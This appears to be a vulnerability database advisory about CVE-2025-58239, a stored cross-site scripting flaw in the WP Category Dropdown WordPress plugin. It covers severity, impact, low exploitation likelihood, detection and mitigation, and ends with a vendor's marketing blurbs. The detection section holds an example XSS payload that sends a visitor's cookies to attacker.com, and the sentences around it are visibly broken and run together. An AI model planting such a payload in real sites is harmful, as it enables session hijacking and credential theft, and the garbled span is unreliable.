
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-58239 is a Stored Cross-Site Scripting (XSS) vulnerability in the WP Category Dropdown WordPress plugin by Chandrika Sista. It affects all versions up to and including 1.9, with no official patch available at the time of disclosure. The vulnerability was published on September 22, 2025, and carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant. An authenticated attacker with at least Contributor-level privileges can inject malicious scripts into the plugin's input fields, which are then persistently stored and rendered in the browser of any user who visits the affected page. Exploitation requires low attack complexity over a network vector, but does require user interaction (a victim visiting the page containing the injected payload) (Patchstack, Red Hat CVE).
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript or HTML payloads within the WordPress site, which execute in the browsers of visiting users. This can lead to session hijacking, credential theft, unauthorized redirects, defacement, or delivery of malicious content to site visitors. The scope is changed, meaning the impact extends beyond the vulnerable component to affect other users' browser sessions (Patchstack).
No evidence of active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.033%, indicating a low probability of exploitation in the near term. No exploit kits or threat actor attribution have been identified, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack classifies this as low priority, noting it is unlikely to be exploited despite the class of vulnerability being used in mass-exploit campaigns targeting WordPress plugins (Patchstack, Red Hat CVE).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.wp-admin/admin-post.php or wp-admin/post.php) from low-privileged accounts containing script tags or encoded JavaScript payloads.<script> tags or JavaScript URIs stored in WordPress database tables (e.g., wp_posts, wp_options, or plugin-specific tables) associated with WP Category Dropdown entries.As of the disclosure date (September 22, 2025), no official patch is available for the WP Category Dropdown plugin. Site administrators should consider deactivating and removing the plugin until a patched version is released. As a compensating control, restrict Contributor-level user registrations and review existing Contributor accounts for trustworthiness. Web application firewalls (WAFs) with XSS filtering rules can help mitigate exploitation risk in the interim (Patchstack).
Patchstack, which discovered and reported the vulnerability (credited to researcher 'zaim', reported August 1, 2025), classifies it as low priority with no impactful threat at this time. No significant vendor statements, notable researcher commentary, or broader media coverage have been identified beyond the initial Patchstack disclosure (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."